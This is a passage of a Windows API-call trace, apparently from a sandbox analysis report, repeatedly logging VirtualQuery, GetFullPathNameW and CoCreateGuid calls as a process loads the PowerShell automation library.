out: lpBuffer=0x24df70*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.371] GetLastError () returned 0x0 [0145.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.371] GetLastError () returned 0x0 [0145.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.371] GetLastError () returned 0x0 [0145.371] VirtualQuery (in: lpAddress=0x24cf70, lpBuffer=0x24df70, dwLength=0x1c | out: lpBuffer=0x24df70*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.371] VirtualQuery (in: lpAddress=0x24cf08, lpBuffer=0x24df08, dwLength=0x1c | out: lpBuffer=0x24df08*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.371] VirtualQuery (in: lpAddress=0x24cf44, lpBuffer=0x24df44, dwLength=0x1c | out: lpBuffer=0x24df44*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.372] VirtualQuery (in: lpAddress=0x24cf08, lpBuffer=0x24df08, dwLength=0x1c | out: lpBuffer=0x24df08*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.372] VirtualQuery (in: lpAddress=0x24cf44, lpBuffer=0x24df44, dwLength=0x1c | out: lpBuffer=0x24df44*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.373] VirtualQuery (in: lpAddress=0x24cf44, lpBuffer=0x24df44, dwLength=0x1c | out: lpBuffer=0x24df44*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.373] VirtualQuery (in: lpAddress=0x24cf08, lpBuffer=0x24df08, dwLength=0x1c | out: lpBuffer=0x24df08*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.373] VirtualQuery (in: lpAddress=0x24cf44, lpBuffer=0x24df44, dwLength=0x1c | out: lpBuffer=0x24df44*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.373] VirtualQuery (in: lpAddress=0x24cf08, lpBuffer=0x24df08, dwLength=0x1c | out: lpBuffer=0x24df08*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.373] VirtualQuery (in: lpAddress=0x24cf44, lpBuffer=0x24df44, dwLength=0x1c | out: lpBuffer=0x24df44*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.373] VirtualQuery (in: lpAddress=0x24cf08, lpBuffer=0x24df08, dwLength=0x1c | out: lpBuffer=0x24df08*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.374] VirtualQuery (in: lpAddress=0x24cf44, lpBuffer=0x24df44, dwLength=0x1c | out: lpBuffer=0x24df44*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.374] VirtualQuery (in: lpAddress=0x24cdac, lpBuffer=0x24ddac, dwLength=0x1c | out: lpBuffer=0x24ddac*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.374] VirtualQuery (in: lpAddress=0x24cf08, lpBuffer=0x24df08, dwLength=0x1c | out: lpBuffer=0x24df08*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.375] VirtualQuery (in: lpAddress=0x24cf44, lpBuffer=0x24df44, dwLength=0x1c | out: lpBuffer=0x24df44*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.375] VirtualQuery (in: lpAddress=0x24cf08, lpBuffer=0x24df08, dwLength=0x1c | out: lpBuffer=0x24df08*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.375] VirtualQuery (in: lpAddress=0x24cf44, lpBuffer=0x24df44, dwLength=0x1c | out: lpBuffer=0x24df44*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.375] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x62ee07b, Data2=0xc4e1, Data3=0x4a02, Data4=([0]=0xaf, [1]=0x18, [2]=0x1a, [3]=0x2e, [4]=0x75, [5]=0x65, [6]=0x19, [7]=0x91))) returned 0x0 [0145.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.375] GetLastError () returned 0x0 [0145.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.376] GetLastError () returned 0x0 [0145.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.376] GetLastError () returned 0x0 [0145.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.376] GetLastError () returned 0x0 [0145.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.376] GetLastError () returned 0x0 [0145.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.376] GetLastError () returned 0x0 [0145.376] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x600678f0, Data2=0x343a, Data3=0x49da, Data4=([0]=0x8e, [1]=0x73, [2]=0x7, [3]=0x38, [4]=0xec, [5]=0xd1, [6]=0x38, [7]=0xf))) returned 0x0 [0145.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.376] GetLastError () returned 0x0 [0145.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.376] GetLastError () returned 0x0 [0145.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.376] GetLastError () returned 0x0 [0145.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.376] GetLastError () returned 0x0 [0145.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.377] GetLastError () returned 0x0 [0145.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.377] GetLastError () returned 0x0 [0145.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.377] GetLastError () returned 0x0 [0145.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.377] GetLastError () returned 0x0 [0145.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.377] GetLastError () returned 0x0 [0145.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.377] GetLastError () returned 0x0 [0145.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.377] GetLastError () returned 0x0 [0145.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.377] GetLastError () returned 0x0 [0145.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.377] GetLastError () returned 0x0 [0145.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.378] GetLastError () returned 0x0 [0145.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.378] GetLastError () returned 0x0 [0145.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.378] GetLastError () returned 0x0 [0145.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.378] GetLastError () returned 0x0 [0145.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.378] GetLastError () returned 0x0 [0145.378] VirtualQuery (in: lpAddress=0x24cb64, lpBuffer=0x24db64, dwLength=0x1c | out: lpBuffer=0x24db64*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.378] GetLastError () returned 0x0 [0145.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.379] GetLastError () returned 0x0 [0145.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.379] GetLastError () returned 0x0 [0145.379] VirtualQuery (in: lpAddress=0x24cb64, lpBuffer=0x24db64, dwLength=0x1c | out: lpBuffer=0x24db64*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.379] VirtualQuery (in: lpAddress=0x24cba0, lpBuffer=0x24dba0, dwLength=0x1c | out: lpBuffer=0x24dba0*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d558, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.379] GetLastError () returned 0x0 [0145.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d508, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.379] GetLastError () returned 0x0 [0145.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d508, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.379] GetLastError () returned 0x0 [0145.379] VirtualQuery (in: lpAddress=0x24cb64, lpBuffer=0x24db64, dwLength=0x1c | out: lpBuffer=0x24db64*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.379] VirtualQuery (in: lpAddress=0x24cba0, lpBuffer=0x24dba0, dwLength=0x1c | out: lpBuffer=0x24dba0*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d558, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.380] GetLastError () returned 0x0 [0145.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d508, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.380] GetLastError () returned 0x0 [0145.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d508, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.380] GetLastError () returned 0x0 [0145.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.380] GetLastError () returned 0x0 [0145.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.380] GetLastError () returned 0x0 [0145.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.380] GetLastError () returned 0x0 [0145.380] VirtualQuery (in: lpAddress=0x24cb64, lpBuffer=0x24db64, dwLength=0x1c | out: lpBuffer=0x24db64*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.381] VirtualQuery (in: lpAddress=0x24cba0, lpBuffer=0x24dba0, dwLength=0x1c | out: lpBuffer=0x24dba0*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d558, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.381] GetLastError () returned 0x0 [0145.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d508, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.381] GetLastError () returned 0x0 [0145.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d508, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.381] GetLastError () returned 0x0 [0145.381] VirtualQuery (in: lpAddress=0x24cb64, lpBuffer=0x24db64, dwLength=0x1c | out: lpBuffer=0x24db64*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.381] VirtualQuery (in: lpAddress=0x24cba0, lpBuffer=0x24dba0, dwLength=0x1c | out: lpBuffer=0x24dba0*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.382] GetLastError () returned 0x0 [0145.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.382] GetLastError () returned 0x0 [0145.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.382] GetLastError () returned 0x0 [0145.382] GetFullPathNameW (in: 